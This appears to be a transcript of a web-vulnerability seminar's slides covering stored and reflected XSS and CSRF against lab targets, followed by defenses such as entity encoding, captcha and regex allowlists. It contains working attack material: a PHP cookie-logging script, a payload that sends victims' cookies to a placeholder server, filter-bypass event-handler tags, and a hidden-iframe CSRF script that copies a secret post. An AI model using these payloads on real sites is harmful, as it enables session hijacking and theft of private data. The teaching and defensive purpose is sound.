web vulnerability seminar3
TRANSCRIPT
Page 1
Web vulnerability seminar
from make to exploit

Page 2
Contents
- PHP + source code auditing
- DB & SQL injection
- XSS & CSRF
- Something Injection

Page 3
S.. se.. session
- The connection between the server and the user
- Proving to the server that I am "me"

Page 4
PHP SESSION
- Cookie -> PHPSESSID
- A strange-looking string

Page 5
Déjà vu
- Login -> COOKIE
- COOKIE -> deleted -> not logged in
- COOKIE -> not deleted -> logged in

Page 6
Heh heh, admin
- Write a post under my ID
- ??/web/3/

Page 7
What if ..

Page 8
When a post is read

Page 9
Request
image address = 'domain.com/monday.jpg'

Page 10
What is the problem?
- None so far

Page 11
Making the post pretty

Page 12
What is the problem?
- If a script can be written into the post, some of the actions I want can be carried out in the reader's browser.
- What if the cookie (session) value the other party holds on the current page could be sent to my server and recorded?

Page 13
Stored XSS overview
(Diagram with numbered steps 1 to 4; the figure itself is not in the transcript.)

Page 14
A simple test!
<script>alert("test")</script>
<script>alert(document.cookie)</script>
<iframe src=''/>…

Page 15
PHP
<?php
// Cookie logger used in the demo: appends the value of the k parameter and a timestamp to cookie.txt
$hijack = "\r\n" . $_GET['k'] . " : " . date("Y-m-d h:i:s");
$f = fopen("./cookie.txt", "a");
fwrite($f, $hijack, strlen($hijack));
fclose($f);
?>

Page 16
Payload
<script>location.href='http://path/cookie.php?k='+document.cookie</script>

Page 17
With filtering 1
Source
$q = str_replace("script", "", $_GET['inp']);
echo $q;
192.168.1.25/web/xss/test.php

Page 18
With filtering 2
Source
$q = $_GET['inp'];
if (eregi("script", $q))
    exit("HAHA. Do not try XSS");
echo $q;
192.168.1.25/web/xss/test2.php

Page 19
With filtering 3
Source
$q = $_GET['inp'];
if (eregi("script|alert", $q))
    exit("HAHA. Do not try XSS");
echo $q;
192.168.1.25/web/xss/test3.php

Page 20
While writing a post naturally
- <img src='' onload=''>
- <img src='' onerror=''>
- <img src='' onmouseover=''>
…

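The three "With filtering" blacklists above, side by side with the entity encoding that the later "What to do" slide recommends, as an added JavaScript example (not code from the seminar): the blacklists leave the `<img ... onerror>` form from this slide intact, while encoding turns every sample into inert text. The `containsTag` heuristic and the extra encoded characters (`&`, `"`, `'`) are assumptions for this example.

```javascript
// Added example, not from the seminar slides: the three "With filtering"
// blacklists rewritten in JavaScript, beside the entity encoding that the
// "What to do" slide recommends. Blacklists leave markup intact; encoding
// turns it into inert text.

// Filter 1: strip the word "script" (mirrors str_replace("script", "", $q)).
function filter1(input) {
  return input.split("script").join("");
}

// Filter 2: reject input containing "script", case-insensitively (mirrors eregi).
// Returns null for a rejected input.
function filter2(input) {
  return /script/i.test(input) ? null : input;
}

// Filter 3: reject "script" or "alert", case-insensitively.
function filter3(input) {
  return /script|alert/i.test(input) ? null : input;
}

// Mitigation: encode every character that can open a tag or break out of an
// attribute value. The slide shows only < and >; & " ' are added here
// (assumption) because post text often lands inside attributes as well.
function encodeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Defender's check (a heuristic assumed for this example, not an HTML parser):
// does the string still contain something a browser would parse as a start tag?
function containsTag(s) {
  return /<\s*[a-z]/i.test(s);
}

// Constructed samples, taken from the slide payloads.
const SCRIPT_SAMPLE = '<script>alert("test")</script>';
const IMG_SAMPLE = "<img src='' onerror=''>";

// Run each filter and the encoder over a sample; true means a tag survived.
function survivesAs(sample) {
  const f2 = filter2(sample);
  const f3 = filter3(sample);
  return {
    filter1: containsTag(filter1(sample)),
    filter2: f2 !== null && containsTag(f2),
    filter3: f3 !== null && containsTag(f3),
    encoded: containsTag(encodeHtml(sample)),
  };
}
```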
Page 21
Reflected XSS
- Unlike Stored, possible even without a place to store the payload
- Everything Stored XSS can do is possible here too

Page 22
Rehash
image address = 'domain.com/monday.jpg'

Page 23
Reflected XSS overview
(Diagram with numbered steps 1 to 4; the figure itself is not in the transcript.)

Page 24
XSS = XSS
- Every attack possible with Stored is also possible with Reflected.

Page 25
Scenario
- Confirm the XSS attack
- Navigate to a page into which a malicious script has been injected via XSS
- Reverse Connection!

Page 26
Heh heh

Page 27
CSRF
- Secondary damage derived from XSS

Page 28
CSRF overview
(Diagram with numbered steps 1 to 4; the figure itself is not in the transcript.)

Page 29
Return to XSS
- Let's send a request to the server with <script ~~>!
- Let's get the admin to read it and read the secret post!

Page 30
Practice
Post-writing example
<iframe src='http://127.0.0.1/web/csrf/board/write_ok.php?user_id=TEST&title=qwer&pw=&contents=zxcv' width=0 height=0 frameborder=0></iframe>

Page 31
Let's read the secret post.
1. Request the page on which the post is displayed
2. Fetch the HTML source of the requested page
3. Write the fetched source into a new post as-is.

Page 32
Let's pull out the secret post.
<script>
function sending(html) {
    var f = document.getElementById("csrf");
    var a = unescape(html);
    var c = "http://127.0.0.1/web/csrf/board/write_ok.php?user_id=TEST&title=qwwer&pw=aa&contents=" + a;
    if (html != "")
        f.src = c;
    else
        f.src = "";
}
document.write("<iframe id='csrf' src=http://127.0.0.1/web/csrf/board/view.php?num=70 width=0px height=0px frameborder=0 onload=sending(this.contentWindow.document.body.innerHTML)></iframe>");
</script>

Page 33
Explanation
document.write("")
Writes the content passed as its argument into the HTML
All kinds of variable values can be used!

Page 34
IFRAME
<iframe id='csrf'
src=http://127.0.0.1/web/csrf/board/view.php?num=70
width=0px height=0px frameborder=0
onload=sending(this.contentWindow.document.body.innerHTML)></iframe>

Page 35
Function
function sending(html) {
    var f = document.getElementById("csrf");
    var a = unescape(html);
    var c = "http://127.0.0.1/web/csrf/board/write_ok.php?user_id=TEST&title=qwwer&pw=aa&contents=" + a;
    if (html != "")
        f.src = c;
    else
        f.src = "";
}
(The slide's diagram annotates the two iframe src values: src=http://127.0.0.1/web/csrf/board/view.php?num=70 for the read, then src=http://127.0.0.1/web/csrf/board/write_ok.php?user_id=TEST&title=qwwer&pw=aa&contents= for the write-back.)

Page 36
What to do
< : &lt;
> : &gt;
They lose their special meaning.

Page 37
How it will look (displayed as text, not executed)
<script>Something Text </script>
<img src='' onload=''/>
<img src='evil.php'/>

Page 38
Additional CSRF countermeasures
- Check that whoever sent the request is really a person
-> captcha

Page 39
Summary
- Just don't allow any scripts on the board and make people write plain, rigid posts..
- If scripts must be provided, use a regular expression and anything that deviates from the specified form is OUT!
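The summary's second rule carried out as an added JavaScript example (not code from the seminar): an allowlist that accepts plain text plus image tags of one fixed shape, like the `domain.com/monday.jpg` image from the earlier slides, rejects anything else, and entity-encodes the text parts when rendering. The exact tag shape, host pattern and image extensions are assumptions for this example.

```javascript
// Added example, not from the seminar slides: the summary's allowlist rule.
// Post text may contain plain text and image tags of exactly one shape,
//   <img src='http://host/path/name.jpg'>
// (host pattern and extensions are assumptions for this example).
// Any other tag, attribute or event handler is rejected outright.
const IMG_TAG = /<img src='https?:\/\/[a-z0-9.-]+\/[a-z0-9_\/.-]*\.(?:jpg|png|gif)'>/gi;

// Characters that can start markup are forbidden outside the allowed form, so
// the post is checked after the allowed tags have been removed.
// Returns { ok: true, images } or { ok: false, reason }.
function validatePost(body) {
  const allowed = body.match(IMG_TAG) || [];
  const rest = body.replace(IMG_TAG, "");
  if (/[<>]/.test(rest)) {
    return { ok: false, reason: "markup outside the allowed <img> form" };
  }
  return { ok: true, images: allowed.length };
}

// Rendering step for an accepted post: the plain-text parts are entity-encoded
// (the fix from the "What to do" slide), while the allowed image tags pass
// through unchanged because the regular expression pinned their contents.
// Returns null when the post fails validation.
function renderPost(body) {
  if (!validatePost(body).ok) return null;
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  const parts = body.split(IMG_TAG);
  const tags = body.match(IMG_TAG) || [];
  let out = "";
  parts.forEach((text, i) => {
    out += text.replace(/[&<>"']/g, (c) => map[c]);
    if (i < tags.length) out += tags[i];
  });
  return out;
}
```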